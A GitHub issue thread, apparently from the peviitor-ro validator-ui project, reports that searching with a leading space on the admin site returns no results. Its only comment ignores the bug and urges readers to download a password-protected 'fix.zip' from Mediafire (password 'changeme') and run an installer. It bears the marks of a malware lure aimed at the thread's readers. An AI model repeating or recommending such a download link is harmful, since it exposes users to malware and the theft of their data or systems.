### ISSUE TITLE
TC Test Search with Leading Spaces #271

### ISSUE THREAD

**Issue by RoxanaDanalache** [peviitor-ro/validator-ui#284]
ENVIRONMENT:
URL: https://admin.peviitor.ro/
Browser: Chrome
Device: PC
OS: Windows 10

STEPS TO REPRODUCE:
Enter URL "https://admin.peviitor.ro/" in to the browser
Press ENTER Main page opens
Press space before the company name in the search bar.
Expected result: The company name should appear
Actual result: No results found

![image](https://github.com/user-attachments/assets/0d347fc5-d0a4-4301-8661-400c6fe5df7f)

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
